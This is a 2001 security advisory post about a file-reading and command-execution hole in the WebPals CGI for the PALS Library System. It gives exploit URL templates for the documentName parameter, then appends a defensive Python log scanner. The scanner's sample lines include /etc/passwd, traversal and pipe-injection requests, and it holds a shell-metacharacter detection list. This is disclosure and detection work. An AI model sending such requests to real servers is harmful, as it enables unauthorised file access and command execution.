From: UkR-XblP™ (cuctemaOK.RU)
Date: Mon Feb 12 2001 - 08:17:46 CST

    Name: PALS Library System "show files" Vulnerability and
    remote command execution.
    Date: 02.02.2001
    About: This script is derived from an idea originated at
    St. Olaf College to provide a www interface to the PALS
    Library System. This idea was then worked on at Georgia
    State University. This version of WebPals has been written
    using their original idea.
    Problem: Through this bug you can view any file and execute
    commands. The problem lies in the "pine pipe bug".
    Author: UkR-XblP
    Exploit:
    http://www.victim.com/cgi-bin/pals-cgi?palsAction=restart&documentName=url_to_file
    http://www.victim.com/pals-cgi?palsAction=restart&documentName=url_to_command
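
A defender-side check for the request pattern in the advisory, as an added example that is not part of the original post: it scans web access logs for pals-cgi requests whose documentName parameter is an absolute path, climbs directories, or carries shell metacharacters such as the pipe. The log lines, the function names and the set of flagged characters are assumptions made for illustration.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample access-log lines; addresses, times and values are made up.
SAMPLE_LOG = """\
192.0.2.10 - - [12/Feb/2001:08:20:01 -0600] "GET /cgi-bin/pals-cgi?palsAction=restart&documentName=welcome.html HTTP/1.0" 200 512
192.0.2.44 - - [12/Feb/2001:08:21:17 -0600] "GET /cgi-bin/pals-cgi?palsAction=restart&documentName=/etc/passwd HTTP/1.0" 200 1843
192.0.2.44 - - [12/Feb/2001:08:21:40 -0600] "GET /cgi-bin/pals-cgi?palsAction=restart&documentName=%2e%2e%2f%2e%2e%2fetc%2fhosts HTTP/1.0" 200 220
192.0.2.44 - - [12/Feb/2001:08:22:03 -0600] "GET /pals-cgi?palsAction=restart&documentName=%7Cplaceholder HTTP/1.0" 200 64
192.0.2.10 - - [12/Feb/2001:08:25:00 -0600] "GET /index.html HTTP/1.0" 200 1024
"""

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
SHELL_META = set("|;&`$<>")  # assumed set; the pipe is the one the advisory names

def decode_fully(value, rounds=3):
    """Undo repeated percent-encoding so %252e%252e is seen as '..'."""
    for _ in range(rounds):
        value = unquote(value)
    return value

def classify(document_name):
    """Return the reasons a documentName value looks unsafe (empty if none)."""
    name = decode_fully(document_name)
    reasons = []
    if name.startswith("/"):
        reasons.append("absolute-path")
    if ".." in re.split(r"[/\\]", name):
        reasons.append("parent-traversal")
    if SHELL_META & set(name):
        reasons.append("shell-metachar")
    return reasons

def scan(log_text):
    """Yield (client, decoded documentName, reasons) for suspicious pals-cgi hits."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST_RE.search(line)
        url = urlsplit(m.group(1)) if m else None
        if url is None or not url.path.endswith("/pals-cgi"):
            continue
        for raw in parse_qs(url.query).get("documentName", []):
            reasons = classify(raw)
            if reasons:
                findings.append((line.split()[0], decode_fully(raw), reasons))
    return findings

if __name__ == "__main__":
    for client, name, reasons in scan(SAMPLE_LOG):
        print(f"{client}  documentName={name!r}  {', '.join(reasons)}")
```

The same `classify` test works as an allow-list gate in front of the CGI: reject any request for which it returns a non-empty list.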